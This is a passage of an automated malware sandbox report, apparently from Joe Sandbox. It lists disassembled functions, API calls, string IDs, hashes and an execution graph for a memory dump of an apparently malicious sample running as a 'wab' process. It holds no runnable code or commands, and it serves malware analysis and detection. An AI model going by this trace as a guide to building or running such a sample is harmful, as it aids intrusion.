                                          • GetLastError.KERNEL32(?,22B25C88,22B21D66,00000000,00000000,00000000,?,22B25E85,00000006,FlsSetValue,22B2E190,FlsSetValue,00000000,00000364,?,22B25BC8), ref: 22B25D1F
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,22B25C88,22B21D66,00000000,00000000,00000000,?,22B25E85,00000006,FlsSetValue,22B2E190,FlsSetValue,00000000), ref: 22B25D2D
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID:
                                          • API String ID: 3177248105-0
                                          • Opcode ID: fa2a35ce4532f367a58d4293e6a1a58847cc530c0fbaaee8652e38ef82d27ff3
                                          • Instruction ID: c1654c11ac4bba77a9b9e5a43e07047be3f321768a419ee980100c6189d03e2f
                                          • Opcode Fuzzy Hash: fa2a35ce4532f367a58d4293e6a1a58847cc530c0fbaaee8652e38ef82d27ff3
                                          • Instruction Fuzzy Hash: 0101D436651B23ABC3158AA88C68F873798EF05AE1B110B21FE0DD7154DB24D801CBE0
                                          Function 22B263F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 22B2655C
                                            • Part of subcall function 22B262BC: IsProcessorFeaturePresent.KERNEL32(00000017,22B262AB,00000000,?,?,?,?,00000016,?,?,22B262B8,00000000,00000000,00000000,00000000,00000000), ref: 22B262BE
                                            • Part of subcall function 22B262BC: GetCurrentProcess.KERNEL32(C0000417), ref: 22B262E0
                                            • Part of subcall function 22B262BC: TerminateProcess.KERNEL32(00000000), ref: 22B262E7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                          • String ID: *?$.
                                          • API String ID: 2667617558-3972193922
                                          • Opcode ID: 955f8816f659e185f00f92218b39417c5828b33bc110d75ee76c0e922da6d05d
                                          • Instruction ID: 9e388bb4a588db7894f741ab8fd9decb04eccbcda7376e2bf2ff7b2a11a18f3b
                                          • Opcode Fuzzy Hash: 955f8816f659e185f00f92218b39417c5828b33bc110d75ee76c0e922da6d05d
                                          • Instruction Fuzzy Hash: 88519F75E00709EFDB04CFB8C980AADBBB9EF58314F248269D958E7355E6359E018B50
                                          Function 22B216AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID: : $Se.
                                          • API String ID: 4218353326-4089948878
                                          • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                          • Instruction ID: 33448acd6b02d9b92025b55a0796d9a264e49194542e0649a13279b009311ccc
                                          • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                          • Instruction Fuzzy Hash: 9A11E3B5A10748AECB10CFA8D840BDEFBFCEF59304F10405AE549E7222E6705B02CB65
                                          Function 22B21EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 22B22903
                                            • Part of subcall function 22B235D2: RaiseException.KERNEL32(?,?,?,22B22925,00000000,00000000,00000000,?,?,?,?,?,22B22925,?,22B321B8), ref: 22B23632
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 22B22920
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw$ExceptionRaise
                                          • String ID: Unknown exception
                                          • API String ID: 3476068407-410509341
                                          • Opcode ID: 0818b886338dc168acc20529f3d55aa5f65294aa5c891ad5f6aae18c4458fb6a
                                          • Instruction ID: e0e6b1e46b2bcb342ffb66a9c77f9ce1bfebc20ada686c7b2ee370608acdf631
                                          • Opcode Fuzzy Hash: 0818b886338dc168acc20529f3d55aa5f65294aa5c891ad5f6aae18c4458fb6a
                                          • Instruction Fuzzy Hash: E1F0AF34E00F0D778B04EAA4ED449A9777C9F28750B504371BA6CEA4A1EFF2EA56C581

                                          Execution Graph

                                          Execution Coverage:6.7%
                                          Dynamic/Decrypted Code Coverage:9.2%
                                          Signature Coverage:1.5%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:101
                                          execution_graph 40605 441a5b 40606 441a66 40605->40606 40609 430937 40606->40609 40610 430956 40609->40610 40611 430977 40609->40611 40610->40611 40613 430969 40610->40613 40617 43097e 40610->40617 40687 42c02e memset 40611->40687 40686 4169a7 11 API calls 40613->40686 40614 430a79 40617->40611 40618 431a7b 40617->40618 40619 431aa3 40618->40619 40675 431b2e 40618->40675 40621 43817e 139 API calls 40619->40621 40619->40675 40624 431ab6 40621->40624 40622 432116 40706 4325ad memset 40622->40706 40629 431b15 40624->40629 40624->40675 40688 43041c 12 API calls 40624->40688 40625 432122 40625->40611 40627 431ad5 40628 431b04 40627->40628 40627->40675 40689 42faf4 12 API calls 40627->40689 40633 42ff8c 139 API calls 40628->40633 40630 431baa 40629->40630 40631 431b7c memcmp 40629->40631 40629->40675 40634 431bb0 40630->40634 40635 431bcb 40630->40635 40631->40630 40650 431b95 40631->40650 40633->40629 40691 4169a7 11 API calls 40634->40691 40638 431bd1 40635->40638 40639 431c45 40635->40639 40692 43034a memcpy 40638->40692 40642 4165ff 11 API calls 40639->40642 40641 431bdc 40641->40675 40693 430468 11 API calls 40641->40693 40644 431c65 40642->40644 40645 431cba 40644->40645 40644->40675 40694 42bf4c 14 API calls 40644->40694 40648 415a91 memset 40645->40648 40647 431bef 40647->40644 40647->40650 40647->40675 40651 431d17 40648->40651 40649 431ca1 40649->40675 40695 42bfcf memcpy 40649->40695 40650->40675 40690 4169a7 11 API calls 40650->40690 40652 431d27 memcpy 40651->40652 40651->40675 40660 431da8 40652->40660 40667 431e97 40652->40667 40654 431eb8 40697 4169a7 11 API calls 40654->40697 40655 431f3c 40657 431fc3 40655->40657 40658 431f45 40655->40658 40659 4397fd memset 40657->40659 40698 4172c8 memset 40658->40698 40661 431fd4 40659->40661 40660->40654 40662 431e12 memcpy 40660->40662 40660->40667 40660->40675 40696 430af5 16 API calls 40660->40696 40661->40675 40700 4328e4 12 API calls 40661->40700 40662->40660 40666 431feb 40701 4233ae 11 API calls 40666->40701 40667->40655 40670 431f6a 40667->40670 40669 431ffc 40671 43202e 40669->40671 40674 4165ff 11 API calls 40669->40674 40670->40675 40699 4169a7 11 API calls 40670->40699 40702 42fe8b 22 API calls 40671->40702 40674->40671 40705 42c02e memset 40675->40705 40676 432057 40676->40675 40703 431917 23 API calls 40676->40703 40678 432079 40704 430b5d 11 API calls 40678->40704 40686->40611 40687->40614 40688->40627 40689->40628 40690->40675 40691->40675 40692->40641 40693->40647 40694->40649 40695->40645 40696->40660 40697->40675 40698->40675 40699->40675 40700->40666 40701->40669 40702->40676 40703->40678 40705->40622 40706->40625 40583 441819 40586 430737 40583->40586 40585 441825 40587 430756 40586->40587 40599 43076d 40586->40599 40588 430774 40587->40588 40589 43075f 40587->40589 40601 43034a memcpy 40588->40601 40600 4169a7 11 API calls 40589->40600 40592 4307ce 40593 430819 memset 40592->40593 40602 415b2c 11 API calls 40592->40602 40593->40599 40594 43077e 40594->40592 40597 4307fa 40594->40597 40594->40599 40596 4307e9 40596->40593 40596->40599 40603 4169a7 11 API calls 40597->40603 40599->40585 40600->40599 40601->40594 40602->40596 40603->40599 37672 442ec6 19 API calls 37849 4152c6 malloc 37850 4152e2 37849->37850 37851 4152ef 37849->37851 37853 416760 11 API calls 37851->37853 37853->37850 37854 4466f4 37873 446904 37854->37873 37856 446700 GetModuleHandleA 37859 446710 __set_app_type __p__fmode __p__commode 37856->37859 37858 4467a4 37860 4467ac __setusermatherr 37858->37860 37861 4467b8 37858->37861 37859->37858 37860->37861 37874 4468f0 _controlfp 37861->37874 37863 4467bd _initterm __wgetmainargs _initterm 37865 44681e GetStartupInfoW 37863->37865 37866 446810 37863->37866 37867 446866 GetModuleHandleA 37865->37867 37875 41276d 37867->37875 37871 446896 exit 37872 44689d _cexit 37871->37872 37872->37866 37873->37856 37874->37863 37876 41277d 37875->37876 37918 4044a4 LoadLibraryW 37876->37918 37878 412785 37910 412789 37878->37910 37926 414b81 37878->37926 37881 4127c8 37932 412465 memset ??2@YAPAXI 37881->37932 37883 4127ea 37944 40ac21 37883->37944 37888 412813 37962 40dd07 memset 37888->37962 37889 412827 37967 40db69 memset 37889->37967 37892 412822 37988 4125b6 ??3@YAXPAX 37892->37988 37894 40ada2 _wcsicmp 37895 41283d 37894->37895 37895->37892 37898 412863 CoInitialize 37895->37898 37972 41268e 37895->37972 37992 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37898->37992 37902 41296f 37994 40b633 37902->37994 37905 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37909 412957 37905->37909 37915 4128ca 37905->37915 37909->37892 37910->37871 37910->37872 37911 4128d0 TranslateAcceleratorW 37912 412941 GetMessageW 37911->37912 37911->37915 37912->37909 37912->37911 37913 412909 IsDialogMessageW 37913->37912 37913->37915 37914 4128fd IsDialogMessageW 37914->37912 37914->37913 37915->37911 37915->37913 37915->37914 37916 41292b TranslateMessage DispatchMessageW 37915->37916 37917 41291f IsDialogMessageW 37915->37917 37916->37912 37917->37912 37917->37916 37919 4044cf GetProcAddress 37918->37919 37922 4044f7 37918->37922 37920 4044e8 FreeLibrary 37919->37920 37923 4044df 37919->37923 37921 4044f3 37920->37921 37920->37922 37921->37922 37924 404507 MessageBoxW 37922->37924 37925 40451e 37922->37925 37923->37920 37924->37878 37925->37878 37927 414b8a 37926->37927 37928 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37926->37928 37998 40a804 memset 37927->37998 37928->37881 37931 414b9e GetProcAddress 37931->37928 37933 4124e0 37932->37933 37934 412505 ??2@YAPAXI 37933->37934 37935 41251c 37934->37935 37937 412521 37934->37937 38020 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37935->38020 38009 444722 37937->38009 37943 41259b wcscpy 37943->37883 38025 40b1ab ??3@YAXPAX ??3@YAXPAX 37944->38025 37948 40ad4b 37957 40ad76 37948->37957 38049 40a9ce 37948->38049 37949 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37951 40ac5c 37949->37951 37951->37948 37951->37949 37952 40ace7 ??3@YAXPAX 37951->37952 37951->37957 38029 40a8d0 37951->38029 38041 4099f4 37951->38041 37952->37951 37956 40a8d0 7 API calls 37956->37957 38026 40aa04 37957->38026 37958 40ada2 37959 40adc9 37958->37959 37960 40adaa 37958->37960 37959->37888 37959->37889 37960->37959 37961 40adb3 _wcsicmp 37960->37961 37961->37959 37961->37960 38054 40dce0 37962->38054 37964 40dd3a GetModuleHandleW 38059 40dba7 37964->38059 37968 40dce0 3 API calls 37967->37968 37969 40db99 37968->37969 38131 40dae1 37969->38131 38145 402f3a 37972->38145 37974 412766 37974->37892 37974->37898 37975 4126d3 _wcsicmp 37976 4126a8 37975->37976 37976->37974 37976->37975 37978 41270a 37976->37978 38180 4125f8 7 API calls 37976->38180 37978->37974 38148 411ac5 37978->38148 37989 4125da 37988->37989 37990 4125f0 37989->37990 37991 4125e6 DeleteObject 37989->37991 37993 40b1ab ??3@YAXPAX ??3@YAXPAX 37990->37993 37991->37990 37992->37905 37993->37902 37995 40b640 37994->37995 37996 40b639 ??3@YAXPAX 37994->37996 37997 40b1ab ??3@YAXPAX ??3@YAXPAX 37995->37997 37996->37995 37997->37910 37999 40a83b GetSystemDirectoryW 37998->37999 38000 40a84c wcscpy 37998->38000 37999->38000 38005 409719 wcslen 38000->38005 38003 40a881 LoadLibraryW 38004 40a886 38003->38004 38004->37928 38004->37931 38006 409724 38005->38006 38007 409739 wcscat LoadLibraryW 38005->38007 38006->38007 38008 40972c wcscat 38006->38008 38007->38003 38007->38004 38008->38007 38010 444732 38009->38010 38011 444728 DeleteObject 38009->38011 38021 409cc3 38010->38021 38011->38010 38013 412551 38014 4010f9 38013->38014 38015 401130 38014->38015 38016 401134 GetModuleHandleW LoadIconW 38015->38016 38017 401107 wcsncat 38015->38017 38018 40a7be 38016->38018 38017->38015 38019 40a7d2 38018->38019 38019->37943 38019->38019 38020->37937 38024 409bfd memset wcscpy 38021->38024 38023 409cdb CreateFontIndirectW 38023->38013 38024->38023 38025->37951 38027 40aa14 38026->38027 38028 40aa0a ??3@YAXPAX 38026->38028 38027->37958 38028->38027 38030 40a8eb 38029->38030 38031 40a8df wcslen 38029->38031 38032 40a906 ??3@YAXPAX 38030->38032 38033 40a90f 38030->38033 38031->38030 38035 40a919 38032->38035 38034 4099f4 3 API calls 38033->38034 38034->38035 38036 40a932 38035->38036 38037 40a929 ??3@YAXPAX 38035->38037 38039 4099f4 3 API calls 38036->38039 38038 40a93e memcpy 38037->38038 38038->37951 38040 40a93d 38039->38040 38040->38038 38042 409a41 38041->38042 38043 4099fb malloc 38041->38043 38042->37951 38045 409a37 38043->38045 38046 409a1c 38043->38046 38045->37951 38047 409a30 ??3@YAXPAX 38046->38047 38048 409a20 memcpy 38046->38048 38047->38045 38048->38047 38050 40a9e7 38049->38050 38051 40a9dc ??3@YAXPAX 38049->38051 38053 4099f4 3 API calls 38050->38053 38052 40a9f2 38051->38052 38052->37956 38053->38052 38078 409bca GetModuleFileNameW 38054->38078 38056 40dce6 wcsrchr 38057 40dcf5 38056->38057 38058 40dcf9 wcscat 38056->38058 38057->38058 38058->37964 38079 44db70 38059->38079 38063 40dbfd 38082 4447d9 38063->38082 38066 40dc34 wcscpy wcscpy 38108 40d6f5 38066->38108 38067 40dc1f wcscpy 38067->38066 38070 40d6f5 3 API calls 38071 40dc73 38070->38071 38072 40d6f5 3 API calls 38071->38072 38073 40dc89 38072->38073 38074 40d6f5 3 API calls 38073->38074 38075 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38074->38075 38114 40da80 38075->38114 38078->38056 38080 40dbb4 memset memset 38079->38080 38081 409bca GetModuleFileNameW 38080->38081 38081->38063 38084 4447f4 38082->38084 38083 40dc1b 38083->38066 38083->38067 38084->38083 38085 444807 ??2@YAPAXI 38084->38085 38086 44481f 38085->38086 38087 444873 _snwprintf 38086->38087 38088 4448ab wcscpy 38086->38088 38121 44474a 8 API calls 38087->38121 38090 4448bb 38088->38090 38122 44474a 8 API calls 38090->38122 38091 4448a7 38091->38088 38091->38090 38093 4448cd 38123 44474a 8 API calls 38093->38123 38095 4448e2 38124 44474a 8 API calls 38095->38124 38097 4448f7 38125 44474a 8 API calls 38097->38125 38099 44490c 38126 44474a 8 API calls 38099->38126 38101 444921 38127 44474a 8 API calls 38101->38127 38103 444936 38128 44474a 8 API calls 38103->38128 38105 44494b 38129 44474a 8 API calls 38105->38129 38107 444960 ??3@YAXPAX 38107->38083 38109 44db70 38108->38109 38110 40d702 memset GetPrivateProfileStringW 38109->38110 38111 40d752 38110->38111 38112 40d75c WritePrivateProfileStringW 38110->38112 38111->38112 38113 40d758 38111->38113 38112->38113 38113->38070 38115 44db70 38114->38115 38116 40da8d memset 38115->38116 38117 40daac LoadStringW 38116->38117 38118 40dac6 38117->38118 38118->38117 38120 40dade 38118->38120 38130 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38118->38130 38120->37892 38121->38091 38122->38093 38123->38095 38124->38097 38125->38099 38126->38101 38127->38103 38128->38105 38129->38107 38130->38118 38141 409b98 GetFileAttributesW 38131->38141 38133 40daea 38134 40db63 38133->38134 38135 40daef wcscpy wcscpy GetPrivateProfileIntW 38133->38135 38134->37894 38142 40d65d GetPrivateProfileStringW 38135->38142 38137 40db3e 38143 40d65d GetPrivateProfileStringW 38137->38143 38139 40db4f 38144 40d65d GetPrivateProfileStringW 38139->38144 38141->38133 38142->38137 38143->38139 38144->38134 38181 40eaff 38145->38181 38149 411ae2 memset 38148->38149 38150 411b8f 38148->38150 38221 409bca GetModuleFileNameW 38149->38221 38162 411a8b 38150->38162 38152 411b0a wcsrchr 38153 411b22 wcscat 38152->38153 38154 411b1f 38152->38154 38222 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38153->38222 38154->38153 38156 411b67 38223 402afb 38156->38223 38160 411b7f 38279 40ea13 SendMessageW memset SendMessageW 38160->38279 38163 402afb 27 API calls 38162->38163 38164 411ac0 38163->38164 38165 4110dc 38164->38165 38166 41113e 38165->38166 38171 4110f0 38165->38171 38304 40969c LoadCursorW SetCursor 38166->38304 38168 411143 38305 444a54 38168->38305 38308 4032b4 38168->38308 38326 40b1ab ??3@YAXPAX ??3@YAXPAX 38168->38326 38169 4110f7 _wcsicmp 38169->38171 38170 411157 38172 40ada2 _wcsicmp 38170->38172 38171->38166 38171->38169 38327 410c46 10 API calls 38171->38327 38175 411167 38172->38175 38173 4111af 38175->38173 38176 4111a6 qsort 38175->38176 38176->38173 38180->37976 38182 40eb10 38181->38182 38194 40e8e0 38182->38194 38185 40eb6c memcpy memcpy 38186 40ebb7 38185->38186 38186->38185 38187 40ebf2 ??2@YAPAXI ??2@YAPAXI 38186->38187 38188 40d134 16 API calls 38186->38188 38189 40ec2e ??2@YAPAXI 38187->38189 38191 40ec65 38187->38191 38188->38186 38189->38191 38191->38191 38204 40ea7f 38191->38204 38193 402f49 38193->37976 38195 40e8f2 38194->38195 38196 40e8eb ??3@YAXPAX 38194->38196 38197 40e900 38195->38197 38198 40e8f9 ??3@YAXPAX 38195->38198 38196->38195 38199 40e911 38197->38199 38200 40e90a ??3@YAXPAX 38197->38200 38198->38197 38201 40e931 ??2@YAPAXI ??2@YAPAXI 38199->38201 38202 40e921 ??3@YAXPAX 38199->38202 38203 40e92a ??3@YAXPAX 38199->38203 38200->38199 38201->38185 38202->38203 38203->38201 38205 40aa04 ??3@YAXPAX 38204->38205 38206 40ea88 38205->38206 38207 40aa04 ??3@YAXPAX 38206->38207 38208 40ea90 38207->38208 38209 40aa04 ??3@YAXPAX 38208->38209 38210 40ea98 38209->38210 38211 40aa04 ??3@YAXPAX 38210->38211 38212 40eaa0 38211->38212 38213 40a9ce 4 API calls 38212->38213 38214 40eab3 38213->38214 38215 40a9ce 4 API calls 38214->38215 38216 40eabd 38215->38216 38217 40a9ce 4 API calls 38216->38217 38218 40eac7 38217->38218 38219 40a9ce 4 API calls 38218->38219 38220 40ead1 38219->38220 38220->38193 38221->38152 38222->38156 38280 40b2cc 38223->38280 38225 402b0a 38226 40b2cc 27 API calls 38225->38226 38227 402b23 38226->38227 38228 40b2cc 27 API calls 38227->38228 38229 402b3a 38228->38229 38230 40b2cc 27 API calls 38229->38230 38231 402b54 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402b6b 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402b82 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402b99 38236->38237 38238 40b2cc 27 API calls 38237->38238 38239 402bb0 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402bc7 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402bde 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402bf5 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402c0c 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402c23 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402c3a 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402c51 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402c68 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402c7f 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402c99 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402cb3 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402cd5 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402cf0 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402d0b 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402d26 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402d3e 38270->38271 38272 40b2cc 27 API calls 38271->38272 38273 402d59 38272->38273 38274 40b2cc 27 API calls 38273->38274 38275 402d78 38274->38275 38276 40b2cc 27 API calls 38275->38276 38277 402d93 38276->38277 38278 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38277->38278 38278->38160 38279->38150 38283 40b58d 38280->38283 38282 40b2d1 38282->38225 38284 40b5a4 GetModuleHandleW FindResourceW 38283->38284 38285 40b62e 38283->38285 38286 40b5c2 LoadResource 38284->38286 38287 40b5e7 38284->38287 38285->38282 38286->38287 38288 40b5d0 SizeofResource LockResource 38286->38288 38287->38285 38296 40afcf 38287->38296 38288->38287 38290 40b608 memcpy 38299 40b4d3 memcpy 38290->38299 38292 40b61e 38300 40b3c1 18 API calls 38292->38300 38294 40b626 38301 40b04b 38294->38301 38297 40b04b ??3@YAXPAX 38296->38297 38298 40afd7 ??2@YAPAXI 38297->38298 38298->38290 38299->38292 38300->38294 38302 40b051 ??3@YAXPAX 38301->38302 38303 40b05f 38301->38303 38302->38303 38303->38285 38304->38168 38306 444a64 FreeLibrary 38305->38306 38307 444a83 38305->38307 38306->38307 38307->38170 38309 4032c4 38308->38309 38310 40b633 ??3@YAXPAX 38309->38310 38311 403316 38310->38311 38328 44553b 38311->38328 38315 403480 38524 40368c 15 API calls 38315->38524 38317 403489 38318 40b633 ??3@YAXPAX 38317->38318 38319 403495 38318->38319 38319->38170 38320 4033a9 memset memcpy 38321 4033ec wcscmp 38320->38321 38322 40333c 38320->38322 38321->38322 38322->38315 38322->38320 38322->38321 38522 4028e7 11 API calls 38322->38522 38523 40f508 6 API calls 38322->38523 38324 403421 _wcsicmp 38324->38322 38326->38170 38327->38171 38329 445548 38328->38329 38330 445599 38329->38330 38525 40c768 38329->38525 38331 4455a8 memset 38330->38331 38338 4457f2 38330->38338 38608 403988 38331->38608 38342 445854 38338->38342 38710 403e2d memset memset memset memset memset 38338->38710 38339 445672 38619 403fbe memset memset memset memset memset 38339->38619 38340 4458bb memset memset 38346 414c2e 16 API calls 38340->38346 38391 4458aa 38342->38391 38733 403c9c memset memset memset memset memset 38342->38733 38344 44595e memset memset 38351 414c2e 16 API calls 38344->38351 38345 4455e5 38345->38339 38354 44560f 38345->38354 38347 4458f9 38346->38347 38352 40b2cc 27 API calls 38347->38352 38349 445a00 memset memset 38756 414c2e 38349->38756 38350 445b22 38356 445bca 38350->38356 38357 445b38 memset memset memset 38350->38357 38361 44599c 38351->38361 38362 445909 38352->38362 38365 4087b3 338 API calls 38354->38365 38355 445849 38820 40b1ab ??3@YAXPAX ??3@YAXPAX 38355->38820 38363 445c8b memset memset 38356->38363 38430 445cf0 38356->38430 38366 445bd4 38357->38366 38367 445b98 38357->38367 38370 40b2cc 27 API calls 38361->38370 38371 409d1f 6 API calls 38362->38371 38374 414c2e 16 API calls 38363->38374 38364 44589f 38821 40b1ab ??3@YAXPAX ??3@YAXPAX 38364->38821 38372 445621 38365->38372 38380 414c2e 16 API calls 38366->38380 38367->38366 38376 445ba2 38367->38376 38373 4459ac 38370->38373 38384 445919 38371->38384 38806 4454bf 20 API calls 38372->38806 38386 409d1f 6 API calls 38373->38386 38387 445cc9 38374->38387 38893 4099c6 wcslen 38376->38893 38377 4456b2 38808 40b1ab ??3@YAXPAX ??3@YAXPAX 38377->38808 38379 40b2cc 27 API calls 38392 445a4f 38379->38392 38394 445be2 38380->38394 38381 403335 38521 4452e5 45 API calls 38381->38521 38382 445d3d 38414 40b2cc 27 API calls 38382->38414 38383 445d88 memset memset memset 38397 414c2e 16 API calls 38383->38397 38822 409b98 GetFileAttributesW 38384->38822 38385 445823 38385->38355 38396 4087b3 338 API calls 38385->38396 38398 4459bc 38386->38398 38399 409d1f 6 API calls 38387->38399 38389 445879 38389->38364 38410 4087b3 338 API calls 38389->38410 38391->38340 38415 44594a 38391->38415 38771 409d1f wcslen wcslen 38392->38771 38403 40b2cc 27 API calls 38394->38403 38396->38385 38407 445dde 38397->38407 38889 409b98 GetFileAttributesW 38398->38889 38409 445ce1 38399->38409 38400 445bb3 38896 445403 memset 38400->38896 38401 445680 38401->38377 38642 4087b3 memset 38401->38642 38404 445bf3 38403->38404 38413 409d1f 6 API calls 38404->38413 38405 445928 38405->38415 38823 40b6ef 38405->38823 38416 40b2cc 27 API calls 38407->38416 38913 409b98 GetFileAttributesW 38409->38913 38410->38389 38424 445c07 38413->38424 38425 445d54 _wcsicmp 38414->38425 38415->38344 38429 4459ed 38415->38429 38428 445def 38416->38428 38417 4459cb 38417->38429 38438 40b6ef 252 API calls 38417->38438 38421 40b2cc 27 API calls 38422 445a94 38421->38422 38776 40ae18 38422->38776 38423 44566d 38423->38338 38693 413d4c 38423->38693 38434 445389 258 API calls 38424->38434 38435 445d71 38425->38435 38500 445d67 38425->38500 38427 445665 38807 40b1ab ??3@YAXPAX ??3@YAXPAX 38427->38807 38436 409d1f 6 API calls 38428->38436 38429->38349 38429->38350 38430->38381 38430->38382 38430->38383 38431 445389 258 API calls 38431->38356 38440 445c17 38434->38440 38914 445093 23 API calls 38435->38914 38443 445e03 38436->38443 38438->38429 38439 4456d8 38445 40b2cc 27 API calls 38439->38445 38446 40b2cc 27 API calls 38440->38446 38442 44563c 38442->38427 38448 4087b3 338 API calls 38442->38448 38915 409b98 GetFileAttributesW 38443->38915 38444 40b6ef 252 API calls 38444->38381 38450 4456e2 38445->38450 38451 445c23 38446->38451 38447 445d83 38447->38381 38448->38442 38809 413fa6 _wcsicmp _wcsicmp 38450->38809 38455 409d1f 6 API calls 38451->38455 38453 445e12 38460 445e6b 38453->38460 38466 40b2cc 27 API calls 38453->38466 38458 445c37 38455->38458 38456 445aa1 38459 445b17 38456->38459 38474 445ab2 memset 38456->38474 38487 409d1f 6 API calls 38456->38487 38783 40add4 38456->38783 38788 445389 38456->38788 38797 40ae51 38456->38797 38457 4456eb 38462 4456fd memset memset memset memset 38457->38462 38463 4457ea 38457->38463 38464 445389 258 API calls 38458->38464 38890 40aebe 38459->38890 38917 445093 23 API calls 38460->38917 38810 409c70 wcscpy wcsrchr 38462->38810 38813 413d29 38463->38813 38469 445c47 38464->38469 38470 445e33 38466->38470 38476 40b2cc 27 API calls 38469->38476 38477 409d1f 6 API calls 38470->38477 38472 445e7e 38473 445f67 38472->38473 38482 40b2cc 27 API calls 38473->38482 38478 40b2cc 27 API calls 38474->38478 38480 445c53 38476->38480 38481 445e47 38477->38481 38478->38456 38479 409c70 2 API calls 38483 44577e 38479->38483 38484 409d1f 6 API calls 38480->38484 38916 409b98 GetFileAttributesW 38481->38916 38486 445f73 38482->38486 38488 409c70 2 API calls 38483->38488 38489 445c67 38484->38489 38491 409d1f 6 API calls 38486->38491 38487->38456 38492 44578d 38488->38492 38493 445389 258 API calls 38489->38493 38490 445e56 38490->38460 38496 445e83 memset 38490->38496 38494 445f87 38491->38494 38492->38463 38499 40b2cc 27 API calls 38492->38499 38493->38356 38920 409b98 GetFileAttributesW 38494->38920 38498 40b2cc 27 API calls 38496->38498 38501 445eab 38498->38501 38502 4457a8 38499->38502 38500->38381 38500->38444 38503 409d1f 6 API calls 38501->38503 38504 409d1f 6 API calls 38502->38504 38505 445ebf 38503->38505 38506 4457b8 38504->38506 38507 40ae18 9 API calls 38505->38507 38812 409b98 GetFileAttributesW 38506->38812 38517 445ef5 38507->38517 38509 4457c7 38509->38463 38511 4087b3 338 API calls 38509->38511 38510 40ae51 9 API calls 38510->38517 38511->38463 38512 445f5c 38514 40aebe FindClose 38512->38514 38513 40add4 2 API calls 38513->38517 38514->38473 38515 40b2cc 27 API calls 38515->38517 38516 409d1f 6 API calls 38516->38517 38517->38510 38517->38512 38517->38513 38517->38515 38517->38516 38519 445f3a 38517->38519 38918 409b98 GetFileAttributesW 38517->38918 38919 445093 23 API 